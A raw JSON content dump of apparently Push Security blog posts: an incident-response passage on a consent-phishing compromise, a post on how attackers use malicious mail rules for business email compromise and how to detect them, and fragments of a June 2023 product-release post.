users.",{"data":318180,"content":318184,"nodeType":312},{"target":318181},{"sys":318182},{"id":318183,"type":317,"linkType":318},"3qdGQ12PdZFLEyIpmMkwPi",[],{"data":318186,"content":318187,"nodeType":235},{},[318188],{"data":318189,"marks":318190,"value":318191,"nodeType":173},{},[],"How to prevent similar attacks",{"data":318193,"content":318194,"nodeType":178},{},[318195],{"data":318196,"marks":318197,"value":318198,"nodeType":173},{},[],"A very important step following a compromise is to review what happened, how it happened, and what could be done to prevent the incident from occurring again. The interesting part about this incident is that it wasn’t due to a weak password, or even the lack of MFA that led to compromise. It came down to social engineering: instructing an employee to click a link by an account masquerading as their CFO.",{"data":318200,"content":318201,"nodeType":178},{},[318202],{"data":318203,"marks":318204,"value":318205,"nodeType":173},{},[],"For the purposes of this hypothetical incident, we’ll establish that the following occurred:",{"data":318207,"content":318208,"nodeType":250},{},[318209,318219,318229,318239],{"data":318210,"content":318211,"nodeType":254},{},[318212],{"data":318213,"content":318214,"nodeType":178},{},[318215],{"data":318216,"marks":318217,"value":318218,"nodeType":173},{},[],"Andrew Jenkins was targeted in a phishing attack",{"data":318220,"content":318221,"nodeType":254},{},[318222],{"data":318223,"content":318224,"nodeType":178},{},[318225],{"data":318226,"marks":318227,"value":318228,"nodeType":173},{},[],"Andrew authenticated via Microsoft 365, which is a legitimate and expected authentication mechanism and occurs almost daily",{"data":318230,"content":318231,"nodeType":254},{},[318232],{"data":318233,"content":318234,"nodeType":178},{},[318235],{"data":318236,"marks":318237,"value":318238,"nodeType":173},{},[],"No attachments were downloaded, thus in this isolated incident there was no code execution on Andrew’s host, meaning that Anti-Virus or Endpoint Detection & Response (EDR) would not have prevented it",{"data":318240,"content":318241,"nodeType":254},{},[318242],{"data":318243,"content":318244,"nodeType":178},{},[318245],{"data":318246,"marks":318247,"value":318248,"nodeType":173},{},[],"The attacker gained full access to Andrew’s mailbox",{"data":318250,"content":318251,"nodeType":178},{},[318252],{"data":318253,"marks":318254,"value":318255,"nodeType":173},{},[],"The malicious app was disabled by Microsoft after some time, so a full investigation into its capabilities was not possible. We don’t know whether another phishing page was presented after the integration took place, thus to be on the safe side we need to assume this happened and led to credential compromise.",{"data":318257,"content":318258,"nodeType":178},{},[318259,318263,318272],{"data":318260,"marks":318261,"value":318262,"nodeType":173},{},[],"The app was unverified, which has historically been true in most of these scenarios. Publishers need to associate a Microsoft Partner Network (MPN) ID with the app, which follows a ",{"data":318264,"content":318266,"nodeType":186},{"uri":318265},"https://docs.microsoft.com/en-us/partner-center/verification-responses",[318267],{"data":318268,"marks":318269,"value":318271,"nodeType":173},{},[318270],{"type":194},"verification process",{"data":318273,"marks":318274,"value":318275,"nodeType":173},{},[],", in order to have it appear as a verified app. This Microsoft 365 tenant was configured to allow unverified integrations due to an oversight following an app migration project.",{"data":318277,"content":318278,"nodeType":178},{},[318279],{"data":318280,"marks":318281,"value":318282,"nodeType":173},{},[],"This leads us to the following to help prevent similar attacks from occurring in future, and to make sure there is no opportunity for the attacker to leverage any existing foothold:",{"data":318284,"content":318285,"nodeType":250},{},[318286,318296,318306,318316,318337,318353,318363],{"data":318287,"content":318288,"nodeType":254},{},[318289],{"data":318290,"content":318291,"nodeType":178},{},[318292],{"data":318293,"marks":318294,"value":318295,"nodeType":173},{},[],"Disable the integration and remove the malicious app’s permissions",{"data":318297,"content":318298,"nodeType":254},{},[318299],{"data":318300,"content":318301,"nodeType":178},{},[318302],{"data":318303,"marks":318304,"value":318305,"nodeType":173},{},[],"Reset Andrew Jenkins’ credentials",{"data":318307,"content":318308,"nodeType":254},{},[318309],{"data":318310,"content":318311,"nodeType":178},{},[318312],{"data":318313,"marks":318314,"value":318315,"nodeType":173},{},[],"Be aware of and review newly created mail rules",{"data":318317,"content":318318,"nodeType":254},{},[318319],{"data":318320,"content":318321,"nodeType":178},{},[318322,318325,318334],{"data":318323,"marks":318324,"value":37,"nodeType":173},{},[],{"data":318326,"content":318328,"nodeType":186},{"uri":318327},"https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-user-consent?tabs=azure-portal",[318329],{"data":318330,"marks":318331,"value":318333,"nodeType":173},{},[318332],{"type":194},"Confirm that the Microsoft 365 tenant is set to disallow integrations from unverified apps",{"data":318335,"marks":318336,"value":37,"nodeType":173},{},[],{"data":318338,"content":318339,"nodeType":254},{},[318340],{"data":318341,"content":318342,"nodeType":250},{},[318343],{"data":318344,"content":318345,"nodeType":254},{},[318346],{"data":318347,"content":318348,"nodeType":178},{},[318349],{"data":318350,"marks":318351,"value":318352,"nodeType":173},{},[],"Note: as of November 9th, 2020, integrations with unverified apps are disabled by default.",{"data":318354,"content":318355,"nodeType":254},{},[318356],{"data":318357,"content":318358,"nodeType":178},{},[318359],{"data":318360,"marks":318361,"value":318362,"nodeType":173},{},[],"Communicate with employees and other affected parties to be weary of these types of attacks",{"data":318364,"content":318365,"nodeType":254},{},[318366],{"data":318367,"content":318368,"nodeType":178},{},[318369],{"data":318370,"marks":318371,"value":318372,"nodeType":173},{},[],"Perform regular audits against your Microsoft 365 tenants to highlight any discrepancies and integrations with unusual or unnecessary permissions.",{"data":318374,"content":318375,"nodeType":178},{},[318376,318380,318389],{"data":318377,"marks":318378,"value":318379,"nodeType":173},{},[],"Microsoft implementing safe defaults towards limiting integrations from unverified publishers was a step in the right direction. However, there have been ",{"data":318381,"content":318383,"nodeType":186},{"uri":318382},"https://www.proofpoint.com/us/blog/cloud-security/oivavoii-active-malicious-hybrid-cloud-threats-campaign",[318384],{"data":318385,"marks":318386,"value":318388,"nodeType":173},{},[318387],{"type":194},"cases",{"data":318390,"marks":318391,"value":318392,"nodeType":173},{},[]," where attackers utilized compromised publishers to perform similar attacks. ",{"data":318394,"content":318395,"nodeType":235},{},[318396],{"data":318397,"marks":318398,"value":40632,"nodeType":173},{},[],{"data":318400,"content":318401,"nodeType":178},{},[318402],{"data":318403,"marks":318404,"value":318405,"nodeType":173},{},[],"While the process isn’t exactly straightforward, catching early indicators like malicious mail rules helps you prevent an attacker from launching additional attacks like phishing campaigns as they try to gain access to sensitive business data. Removing the mail rule is just the start of the process, you really need to revoke permissions and take the other steps we covered in this post to stop an attack from going any further. We’ll publish some more content on SaaS incident response on our blog, so subscribe to get our guidance straight into your inbox.",{"data":318407,"content":318411,"nodeType":312},{"target":318408},{"sys":318409},{"id":318410,"type":317,"linkType":318},"6oHRbGLus4bstsAc7E0zBD",[],{"data":318413,"content":318414,"nodeType":178},{},[318415],{"data":318416,"marks":318417,"value":37,"nodeType":173},{},[],"We'll walk through how to quickly detect and mitigate business email compromise (BEC) and then prevent future attacks.","2022-09-20T00:00:00.000Z",{"items":318421},[318422,318424],{"sys":318423,"name":509},{"id":508},{"sys":318425,"name":26137},{"id":26136},{"items":318427},[318428],{"fullName":155981,"firstName":155982,"jobTitle":155983,"profilePicture":318429},{"url":155985},{"items":318431},[318432],{"fullName":273632,"firstName":273633,"jobTitle":273634,"profilePicture":318433},{"url":273636},{"json":318435,"links":318846},{"nodeType":165,"data":318436,"content":318437},{},[318438,318456,318463,318470,318542,318549,318654,318673,318680,318687,318694,318701,318707,318714,318733,318740,318747,318754,318761,318768,318791,318798,318805,318812,318819,318826],{"nodeType":178,"data":318439,"content":318440},{},[318441,318444,318452],{"nodeType":173,"value":271556,"marks":318442,"data":318443},[],{},{"nodeType":186,"data":318445,"content":318446},{"uri":208898},[318447],{"nodeType":173,"value":318448,"marks":318449,"data":318451},"new report from Expel",[318450],{"type":194},{},{"nodeType":173,"value":318453,"marks":318454,"data":318455},", the managed detection and response (MDR) vendor found that of all the incidents detected in their SOC, 56% were account compromise and account takeover. Perhaps most surprising, though, is that in around half of those incidents, Expel’s SOC analysts found attackers had created new inbox rules to delete or hide emails that could give them away. Essentially, it’s a living off the land (LOTL) detection evasion technique hackers use to cover their tracks during a Business Email Compromise (BEC) attack.",[],{},{"nodeType":178,"data":318457,"content":318458},{},[318459],{"nodeType":173,"value":318460,"marks":318461,"data":318462},"At Push, we dub those attacker-created email rules “malicious mail rules,” and they’re not only useful for hiding attacks. They can also be used to exfiltrate sensitive data and as a way to get persistent access to victim accounts. ",[],{},{"nodeType":178,"data":318464,"content":318465},{},[318466],{"nodeType":173,"value":318467,"marks":318468,"data":318469},"There are a few different ways that an attacker can compromise an email account and set up malicious mail rules.:",[],{},{"nodeType":246189,"data":318471,"content":318472},{},[318473,318488,318503,318518],{"nodeType":254,"data":318474,"content":318475},{},[318476],{"nodeType":178,"data":318477,"content":318478},{},[318479,318484],{"nodeType":173,"value":318480,"marks":318481,"data":318483},"Phishing attack",[318482],{"type":370},{},{"nodeType":173,"value":318485,"marks":318486,"data":318487},": The attacker tricks their victim into giving them their email account credentials.",[],{},{"nodeType":254,"data":318489,"content":318490},{},[318491],{"nodeType":178,"data":318492,"content":318493},{},[318494,318499],{"nodeType":173,"value":318495,"marks":318496,"data":318498},"Credential stuffing attack",[318497],{"type":370},{},{"nodeType":173,"value":318500,"marks":318501,"data":318502},": The attacker uses credentials that have already been compromised, possibly from another account that shares the same credentials as their email account.",[],{},{"nodeType":254,"data":318504,"content":318505},{},[318506],{"nodeType":178,"data":318507,"content":318508},{},[318509,318514],{"nodeType":173,"value":318510,"marks":318511,"data":318513},"Brute force attack",[318512],{"type":370},{},{"nodeType":173,"value":318515,"marks":318516,"data":318517},": The attacker breaks into the victim’s email account by trying common passwords and their known email username.",[],{},{"nodeType":254,"data":318519,"content":318520},{},[318521],{"nodeType":178,"data":318522,"content":318523},{},[318524,318527,318538],{"nodeType":173,"value":37,"marks":318525,"data":318526},[],{},{"nodeType":1698,"data":318528,"content":318531},{"target":318529},{"sys":318530},{"id":269414,"type":317,"linkType":318},[318532],{"nodeType":173,"value":318533,"marks":318534,"data":318537},"Consent-phishing attack",[318535,318536],{"type":194},{"type":370},{},{"nodeType":173,"value":318539,"marks":318540,"data":318541},": The attacker creates a malicious, but legit-looking, SaaS app, or compromises a genuine SaaS application. The victim consents (or has already consented) that application access to their data, including email, using OAuth 2.0 protocol.",[],{},{"nodeType":178,"data":318543,"content":318544},{},[318545],{"nodeType":173,"value":318546,"marks":318547,"data":318548},"Once the attacker has gained email access through either of the attacks above, they’ll create custom mail rules, which allow them to: ",[],{},{"nodeType":250,"data":318550,"content":318551},{},[318552,318588,318624,318639],{"nodeType":254,"data":318553,"content":318554},{},[318555,318567],{"nodeType":178,"data":318556,"content":318557},{},[318558,318563],{"nodeType":173,"value":318559,"marks":318560,"data":318562},"Forward and delete emails",[318561],{"type":370},{},{"nodeType":173,"value":318564,"marks":318565,"data":318566}," containing sensitive data from employee inboxes to their own: ",[],{},{"nodeType":250,"data":318568,"content":318569},{},[318570],{"nodeType":254,"data":318571,"content":318572},{},[318573],{"nodeType":178,"data":318574,"content":318575},{},[318576,318580,318585],{"nodeType":173,"value":318577,"marks":318578,"data":318579},"Usually attackers will forward emails matching sensitive keywords, like ‘invoice,’ ‘payment,’ or ‘confidential’ to an external email address controlled by the attacker. This is what happened during the ",[],{},{"nodeType":173,"value":318581,"marks":318582,"data":318584},"SANS data breach in 2020",[318583],{"type":194},{},{"nodeType":173,"value":1477,"marks":318586,"data":318587},[],{},{"nodeType":254,"data":318589,"content":318590},{},[318591],{"nodeType":178,"data":318592,"content":318593},{},[318594,318599,318603,318611,318615,318620],{"nodeType":173,"value":318595,"marks":318596,"data":318598},"Delete important emails from particular senders",[318597],{"type":370},{},{"nodeType":173,"value":318600,"marks":318601,"data":318602},", as seen in this ",[],{},{"nodeType":186,"data":318604,"content":318605},{"uri":317309},[318606],{"nodeType":173,"value":318607,"marks":318608,"data":318610},"Reddit thread",[318609],{"type":194},{},{"nodeType":173,"value":318612,"marks":318613,"data":318614},", so the ",[],{},{"nodeType":173,"value":318616,"marks":318617,"data":318619},"attacker can masquerade as an executive",[318618],{"type":370},{},{"nodeType":173,"value":318621,"marks":318622,"data":318623}," at the company for social engineering purposes. Attackers will mark emails from impersonated executives as read and then delete them to improve their social engineering attack. That stops the victim from receiving genuine emails from those execs, which may arouse their suspicions and stop them from responding to the fake exec/attacker. ",[],{},{"nodeType":254,"data":318625,"content":318626},{},[318627],{"nodeType":178,"data":318628,"content":318629},{},[318630,318635],{"nodeType":173,"value":318631,"marks":318632,"data":318634},"Move laterally to other accounts",[318633],{"type":370},{},{"nodeType":173,"value":318636,"marks":318637,"data":318638},", by forwarding and deleting password reset emails to an attacker. This allows attackers to compromise and take over other accounts the victim has with other services. ",[],{},{"nodeType":254,"data":318640,"content":318641},{},[318642],{"nodeType":178,"data":318643,"content":318644},{},[318645,318650],{"nodeType":173,"value":318646,"marks":318647,"data":318649},"Monitor whether their attack has been detected ",[318648],{"type":370},{},{"nodeType":173,"value":318651,"marks":318652,"data":318653},"by forwarding emails that contain any language consistent with the investigation of a potential compromise.",[],{},{"nodeType":178,"data":318655,"content":318656},{},[318657,318660,318669],{"nodeType":173,"value":284153,"marks":318658,"data":318659},[],{},{"nodeType":1698,"data":318661,"content":318664},{"target":318662},{"sys":318663},{"id":289406,"type":317,"linkType":318},[318665],{"nodeType":173,"value":28052,"marks":318666,"data":318668},[318667],{"type":194},{},{"nodeType":173,"value":318670,"marks":318671,"data":318672},". As well as being stealthy, mail rules also give the attacker persistent access to data in their victim’s mailbox, even if they change their password, turn on MFA, or even completely rebuild their workstation.",[],{},{"nodeType":169,"data":318674,"content":318675},{},[318676],{"nodeType":173,"value":318677,"marks":318678,"data":318679},"How to detect suspicious mail rules",[],{},{"nodeType":178,"data":318681,"content":318682},{},[318683],{"nodeType":173,"value":318684,"marks":318685,"data":318686},"Since this is such a common and often-overlooked or hidden attack vector, it’s one of the first features we build into our product at Push. We knew from our time spent as incident responders that it’s a really reliable way to uncover account compromise.",[],{},{"nodeType":178,"data":318688,"content":318689},{},[318690],{"nodeType":173,"value":318691,"marks":318692,"data":318693},"In Push, whenever a new mail rule gets created, we detect it and automatically message the employee who owns the email account to ask whether they just created it. We do this via Slack or Teams and it’s one of our ChatOps messages with the highest and fastest response rates, because employees can instantly say “yes, it was me - I created that mail rule” or “No, I didn’t create it.” They don’t need to know a thing about security to respond to the prompt. ",[],{},{"nodeType":178,"data":318695,"content":318696},{},[318697],{"nodeType":173,"value":318698,"marks":318699,"data":318700},"If they say they don’t recognize it, we alert your security team and they can disable or delete the rule immediately in the alert. ",[],{},{"nodeType":312,"data":318702,"content":318706},{"target":318703},{"sys":318704},{"id":318705,"type":317,"linkType":318},"6gkDIcWO5e9VX7QBVMt02w",[],{"nodeType":178,"data":318708,"content":318709},{},[318710],{"nodeType":173,"value":318711,"marks":318712,"data":318713},"Remember, creating malicious mail rules are a post-compromise activity and rarely the attacker’s sole objective, so you need to determine what else the attacker has gotten up to. They’re a reliable indicator of compromise (IoC) that should trigger an investigation to determine the scope of the incident and the steps necessary to eradicate the attacker from your environment. ",[],{},{"nodeType":178,"data":318715,"content":318716},{},[318717,318721,318729],{"nodeType":173,"value":318718,"marks":318719,"data":318720},"Use Push for free - ",[],{},{"nodeType":186,"data":318722,"content":318724},{"uri":318723},"https://pushsecurity.com/sign-up",[318725],{"nodeType":173,"value":318726,"marks":318727,"data":318728},"sign up today",[],{},{"nodeType":173,"value":318730,"marks":318731,"data":318732}," to start detecting suspicious mail rules that can indicate an ongoing attack. ",[],{},{"nodeType":169,"data":318734,"content":318735},{},[318736],{"nodeType":173,"value":318737,"marks":318738,"data":318739},"Shouldn’t I just disable mail rules to prevent these attacks from happening?",[],{},{"nodeType":178,"data":318741,"content":318742},{},[318743],{"nodeType":173,"value":318744,"marks":318745,"data":318746},"Short answer: No! They can be really useful.",[],{},{"nodeType":178,"data":318748,"content":318749},{},[318750],{"nodeType":173,"value":318751,"marks":318752,"data":318753},"Longer answer: Banning external auto-forwarding of email is too heavy-handed and employees who have legitimate business reasons for using the feature. ",[],{},{"nodeType":235,"data":318755,"content":318756},{},[318757],{"nodeType":173,"value":318758,"marks":318759,"data":318760},"Legitimate reasons for using mail rules…",[],{},{"nodeType":178,"data":318762,"content":318763},{},[318764],{"nodeType":173,"value":318765,"marks":318766,"data":318767},"Many companies/teams will outsource or automate certain processes by forwarding emails. A few common examples of this:",[],{},{"nodeType":250,"data":318769,"content":318770},{},[318771,318781],{"nodeType":254,"data":318772,"content":318773},{},[318774],{"nodeType":178,"data":318775,"content":318776},{},[318777],{"nodeType":173,"value":318778,"marks":318779,"data":318780},"Some tools and SaaS apps don't allow you to set a billing email. So the user that signs up and pays receives the receipt, but needs to get that over to their accounts payable contact.",[],{},{"nodeType":254,"data":318782,"content":318783},{},[318784],{"nodeType":178,"data":318785,"content":318786},{},[318787],{"nodeType":173,"value":318788,"marks":318789,"data":318790},"Many finance and billing apps and tools provide customers with a random email address (on their domain) to forward receipts to, which employees use for expenses",[],{},{"nodeType":235,"data":318792,"content":318793},{},[318794],{"nodeType":173,"value":318795,"marks":318796,"data":318797},"A bit less clear…",[],{},{"nodeType":178,"data":318799,"content":318800},{},[318801],{"nodeType":173,"value":318802,"marks":318803,"data":318804},"A use case that’s in a bit more of a grey area is when you’re working with contractors. Some security-minded companies will provide a company email address to the contractor to prevent them from having to worry about the security of the individual contractor’s email service. Contractors, however, may not want to be checking their corporate email when they’re working with many other companies and having to check separate company email accounts, Slack messages, and so on, so they’ll set up a forwarding rule so they have visibility of all of their contract work in a single email inbox and only use the official corporate email if they need to send an email to that company’s internal team.  ",[],{},{"nodeType":178,"data":318806,"content":318807},{},[318808],{"nodeType":173,"value":318809,"marks":318810,"data":318811},"That particular use case is clearly problematic from a security perspective, but you’ll need to find the balance between keeping the company secure and not overly-restricting employees (or contractors) from getting their work done. There’s no clear right answer for that one.",[],{},{"nodeType":235,"data":318813,"content":318814},{},[318815],{"nodeType":173,"value":318816,"marks":318817,"data":318818},"Limit, but don’t restrict completely",[],{},{"nodeType":178,"data":318820,"content":318821},{},[318822],{"nodeType":173,"value":318823,"marks":318824,"data":318825},"In our opinion, you want to limit the risk without blocking employees and becoming, once again, the dreaded “Department of No.” ",[],{},{"nodeType":178,"data":318827,"content":318828},{},[318829,318833,318842],{"nodeType":173,"value":318830,"marks":318831,"data":318832},"We’ve provided a lot of practical options for how to limit the risks mail rules present ",[],{},{"nodeType":1698,"data":318834,"content":318837},{"target":318835},{"sys":318836},{"id":317617,"type":317,"linkType":318},[318838],{"nodeType":173,"value":28052,"marks":318839,"data":318841},[318840],{"type":194},{},{"nodeType":173,"value":318843,"marks":318844,"data":318845},", including how to manage this risk manually via Google Workspace and Microsoft 365. Of course, we'll also explain how Push can automate these processes for you.",[],{},{"entries":318847},{"inline":318848,"hyperlink":318849,"block":318856},[],[318850,318852,318854],{"sys":318851,"__typename":1528,"title":271616,"slug":271619},{"id":269414},{"sys":318853,"__typename":1528,"title":317594,"slug":317604},{"id":289406},{"sys":318855,"__typename":1528,"title":317937,"slug":317941},{"id":317617},[318857],{"sys":318858,"__typename":5345,"title":318859,"caption":318860,"layoutMode":112585,"file":318861},{"id":318705},"Malicious mail rule channel chatops","Example of a Security team channel notification after an employee confirmed they did not create a suspicious mail rule",{"url":318862,"width":49186,"height":318863},"https://images.ctfassets.net/y1cdw1ablpvd/7Di3p6XTcrrW72VihrWcgm/18636a9977fc63bc3e07c95c6b3ee681/Screenshot_2023-06-02_at_14.33.20__1_.png",590,"content:blog:half-of-account-compromise-attacks-included-malicious-mail-rules.json","blog/half-of-account-compromise-attacks-included-malicious-mail-rules.json","blog/half-of-account-compromise-attacks-included-malicious-mail-rules",{"_path":318868,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":318869,"ogImage":118,"summary":318871,"title":285598,"subtitle":118,"metaTitle":318882,"synopsis":285599,"hashTags":118,"publishedDate":285600,"slug":285601,"tagsCollection":318883,"relatedBlogPostsCollection":318887,"authorsCollection":319754,"content":319758,"_id":320089,"_type":5439,"_source":5440,"_file":320090,"_stem":320091,"_extension":5439},"/blog/product-release-june-2023",{"id":285258,"publishedAt":318870},"2023-08-21T17:29:47.489Z",{"json":318872},{"data":318873,"content":318874,"nodeType":165},{},[318875],{"data":318876,"content":318877,"nodeType":178},{},[318878],{"data":318879,"marks":318880,"value":318881,"nodeType":173},{},[],"Remove problematic third-party integrations, immediately pinpoint security issues, and get Push knowledge on-demand with our new Help Center.","Push Security new product features for June 2023 ",{"items":318884},[318885],{"sys":318886,"name":18399},{"id":18398},{"items":318888},[318889,319322],{"__typename":1528,"sys":318890,"content":318891,"title":301648,"synopsis":301649,"hashTags":118,"publishedDate":301650,"slug":301651,"tagsCollection":319314,"authorsCollection":319318},{"id":301144},{"json":318892},{"nodeType":165,"data":318893,"content":318894},{},[318895,318901,318949,318964,318970,318999,319006,319028,319033,319048,319054,319067,319094,319099,319112,319118,319124,319146,319162,319178,319184,319215,319237,319242,319248,319268,319281,319286,319292],{"nodeType":235,"data":318896,"content":318897},{},[318898],{"nodeType":173,"value":220348,"marks":318899,"data":318900},[],{},{"nodeType":250,"data":318902,"content":318903},{},[318904,318913,318922,318931,318940],{"nodeType":254,"data":318905,"content":318906},{},[318907],{"nodeType":178,"data":318908,"content":318909},{},[318910],{"nodeType":173,"value":301165,"marks":318911,"data":318912},[],{},{"nodeType":254,"data":318914,"content":318915},{},[318916],{"nodeType":178,"data":318917,"content":318918},{},[318919],{"nodeType":173,"value":301175,"marks":318920,"data":318921},[],{},{"nodeType":254,"data":318923,"content":318924},{},[318925],{"nodeType":178,"data":318926,"content":318927},{},[318928],{"nodeType":173,"value":301185,"marks":318929,"data":318930},[],{},{"nodeType":254,"data":318932,"content":318933},{},[318934],{"nodeType":178,"data":318935,"content":318936},{},[318937],{"nodeType":173,"value":301195,"marks":318938,"data":318939},[],{},{"nodeType":254,"data":318941,"content":318942},{},[318943],{"nodeType":178,"data":318944,"content":318945},{},[318946],{"nodeType":173,"value":301205,"marks":318947,"data":318948},[],{},{"nodeType":178,"data":318950,"content":318951},{},[318952,318955,318961],{"nodeType":173,"value":301212,"marks":318953,"data":318954},[],{},{"nodeType":186,"data":318956,"content":318957},{"uri":301217},[318958],{"nodeType":173,"value":301220,"marks":318959,"data":318960},[],{},{"nodeType":173,"value":301224,"marks":318962,"data":318963},[],{},{"nodeType":235,"data":318965,"content":318966},{},[318967],{"nodeType":173,"value":301231,"marks":318968,"data":318969},[],{},{"nodeType":178,"data":318971,"content":318972},{},[318973,318976,318982,318985,318989,318992,318996],{"nodeType":173,"value":37,"marks":318974,"data":318975},[],{},{"nodeType":186,"data":318977,"content":318978},{"uri":301242},[318979],{"nodeType":173,"value":285457,"marks":318980,"data":318981},[],{},{"nodeType":173,"value":301248,"marks":318983,"data":318984},[],{},{"nodeType":173,"value":301252,"marks":318986,"data":318988},[318987],{"type":370},{},{"nodeType":173,"value":301257,"marks":318990,"data":318991},[],{},{"nodeType":173,"value":248675,"marks":318993,"data":318995},[318994],{"type":370},{},{"nodeType":173,"value":301265,"marks":318997,"data":318998},[],{},{"nodeType":178,"data":319000,"content":319001},{},[319002],{"nodeType":173,"value":301272,"marks":319003,"data":319005},[319004],{"type":370},{},{"nodeType":178,"data":319007,"content":319008},{},[319009,319012,319018,319021,319025],{"nodeType":173,"value":301280,"marks":319010,"data":319011},[],{},{"nodeType":186,"data":319013,"content":319014},{"uri":301285},[319015],{"nodeType":173,"value":301288,"marks":319016,"data":319017},[],{},{"nodeType":173,"value":301292,"marks":319019,"data":319020},[],{},{"nodeType":173,"value":301296,"marks":319022,"data":319024},[319023],{"type":370},{},{"nodeType":173,"value":301301,"marks":319026,"data":319027},[],{},{"nodeType":312,"data":319029,"content":319032},{"target":319030},{"sys":319031},{"id":301308,"type":317,"linkType":318},[],{"nodeType":178,"data":319034,"content":319035},{},[319036,319039,319045],{"nodeType":173,"value":301314,"marks":319037,"data":319038},[],{},{"nodeType":186,"data":319040,"content":319041},{"uri":301319},[319042],{"nodeType":173,"value":301322,"marks":319043,"data":319044},[],{},{"nodeType":173,"value":2340,"marks":319046,"data":319047},[],{},{"nodeType":235,"data":319049,"content":319050},{},[319051],{"nodeType":173,"value":301175,"marks":319052,"data":319053},[],{},{"nodeType":178,"data":319055,"content":319056},{},[319057,319060,319064],{"nodeType":173,"value":301338,"marks":319058,"data":319059},[],{},{"nodeType":173,"value":301342,"marks":319061,"data":319063},[319062],{"type":370},{},{"nodeType":173,"value":301347,"marks":319065,"data":319066},[],{},{"nodeType":178,"data":319068,"content":319069},{},[319070,319073,319077,319080,319084,319087,319091],{"nodeType":173,"value":301354,"marks":319071,"data":319072},[],{},{"nodeType":173,"value":301358,"marks":319074,"data":319076},[319075],{"type":370},{},{"nodeType":173,"value":301363,"marks":319078,"data":319079},[],{},{"nodeType":173,"value":301367,"marks":319081,"data":319083},[319082],{"type":370},{},{"nodeType":173,"value":301372,"marks":319085,"data":319086},[],{},{"nodeType":173,"value":301376,"marks":319088,"data":319090},[319089],{"type":370},{},{"nodeType":173,"value":301381,"marks":319092,"data":319093},[],{},{"nodeType":312,"data":319095,"content":319098},{"target":319096},{"sys":319097},{"id":301388,"type":317,"linkType":318},[],{"nodeType":178,"data":319100,"content":319101},{},[319102,319105,319109],{"nodeType":173,"value":301394,"marks":319103,"data":319104},[],{},{"nodeType":173,"value":301398,"marks":319106,"data":319108},[319107],{"type":370},{},{"nodeType":173,"value":301403,"marks":319110,"data":319111},[],{},{"nodeType":178,"data":319113,"content":319114},{},[319115],{"nodeType":173,"value":301410,"marks":319116,"data":319117},[],{},{"nodeType":235,"data":319119,"content":319120},{},[319121],{"nodeType":173,"value":301417,"marks":319122,"data":319123},[],{},{"nodeType":178,"data":319125,"content":319126},{},[319127,319130,319136,319139,319143],{"nodeType":173,"value":301424,"marks":319128,"data":319129},[],{},{"nodeType":186,"data":319131,"content":319132},{"uri":301429},[319133],{"nodeType":173,"value":301432,"marks":319134,"data":319135},[],{},{"nodeType":173,"value":301436,"marks":319137,"data":319138},[],{},{"nodeType":173,"value":301440,"marks":319140,"data":319142},[319141],{"type":370},{},{"nodeType":173,"value":301445,"marks":319144,"data":319145},[],{},{"nodeType":178,"data":319147,"content":319148},{},[319149,319152,319159],{"nodeType":173,"value":301452,"marks":319150,"data":319151},[],{},{"nodeType":186,"data":319153,"content":319154},{"uri":301457},[319155],{"nodeType":173,"value":301460,"marks":319156,"data":319158},[319157],{"type":370},{},{"nodeType":173,"value":148819,"marks":319160,"data":319161},[],{},{"nodeType":178,"data":319163,"content":319164},{},[319165,319168,319175],{"nodeType":173,"value":301471,"marks":319166,"data":319167},[],{},{"nodeType":186,"data":319169,"content":319170},{"uri":301476},[319171],{"nodeType":173,"value":301479,"marks":319172,"data":319174},[319173],{"type":370},{},{"nodeType":173,"value":301484,"marks":319176,"data":319177},[],{},{"nodeType":235,"data":319179,"content":319180},{},[319181],{"nodeType":173,"value":301491,"marks":319182,"data":319183},[],{},{"nodeType":178,"data":319185,"content":319186},{},[319187,319190,319196,319199,319203,319206,319212],{"nodeType":173,"value":301498,"marks":319188,"data":319189},[],{},{"nodeType":186,"data":319191,"content":319192},{"uri":301503},[319193],{"nodeType":173,"value":301506,"marks":319194,"data":319195},[],{},{"nodeType":173,"value":301510,"marks":319197,"data":319198},[],{},{"nodeType":173,"value":301514,"marks":319200,"data":319202},[319201],{"type":370},{},{"nodeType":173,"value":301519,"marks":319204,"data":319205},[],{},{"nodeType":186,"data":319207,"content":319208},{"uri":111940},[319209],{"nodeType":173,"value":21642,"marks":319210,"data":319211},[],{},{"nodeType":173,"value":2340,"marks":319213,"data":319214},[],{},{"nodeType":178,"data":319216,"content":319217},{},[319218,319221,319225,319228,319234],{"nodeType":173,"value":301535,"marks":319219,"data":319220},[],{},{"nodeType":173,"value":301539,"marks":319222,"data":319224},[319223],{"type":370},{},{"nodeType":173,"value":301544,"marks":319226,"data":319227},[],{},{"nodeType":186,"data":319229,"content":319230},{"uri":301549},[319231],{"nodeType":173,"value":21642,"marks":319232,"data":319233},[],{},{"nodeType":173,"value":1477,"marks":319235,"data":319236},[],{},{"nodeType":312,"data":319238,"content":319241},{"target":319239},{"sys":319240},{"id":301561,"type":317,"linkType":318},[],{"nodeType":235,"data":319243,"content":319244},{},[319245],{"nodeType":173,"value":301567,"marks":319246,"data":319247},[],{},{"nodeType":178,"data":319249,"content":319250},{},[319251,319254,319258,319265],{"nodeType":173,"value":21634,"marks":319252,"data":319253},[],{},{"nodeType":173,"value":301577,"marks":319255,"data":319257},[319256],{"type":370},{},{"nodeType":186,"data":319259,"content":319260},{"uri":301457},[319261],{"nodeType":173,"value":301585,"marks":319262,"data":319264},[319263],{"type":370},{},{"nodeType":173,"value":301590,"marks":319266,"data":319267},[],{},{"nodeType":178,"data":319269,"content":319270},{},[319271,319274,319278],{"nodeType":173,"value":301597,"marks":319272,"data":319273},[],{},{"nodeType":173,"value":301601,"marks":319275,"data":319277},[319276],{"type":370},{},{"nodeType":173,"value":1477,"marks":319279,"data":319280},[],{},{"nodeType":312,"data":319282,"content":319285},{"target":319283},{"sys":319284},{"id":301612,"type":317,"linkType":318},[],{"nodeType":235,"data":319287,"content":319288},{},[319289],{"nodeType":173,"value":301618,"marks":319290,"data":319291},[],{},{"nodeType":178,"data":319293,"content":319294},{},[319295,319298,319304,319307,319311],{"nodeType":173,"value":301625,"marks":319296,"data":319297},[],{},{"nodeType":186,"data":319299,"content":319300},{"uri":301630},[319301],{"nodeType":173,"value":301633,"marks":319302,"data":319303},[],{},{"nodeType":173,"value":301637,"marks":319305,"data":319306},[],{},{"nodeType":173,"value":301641,"marks":319308,"data":319310},[319309],{"type":370},{},{"nodeType":173,"value":1477,"marks":319312,"data":319313},[],{},{"items":319315},[319316],{"sys":319317,"name":18399},{"id":18398},{"items":319319},[319320],{"fullName":19125,"firstName":19126,"jobTitle":19127,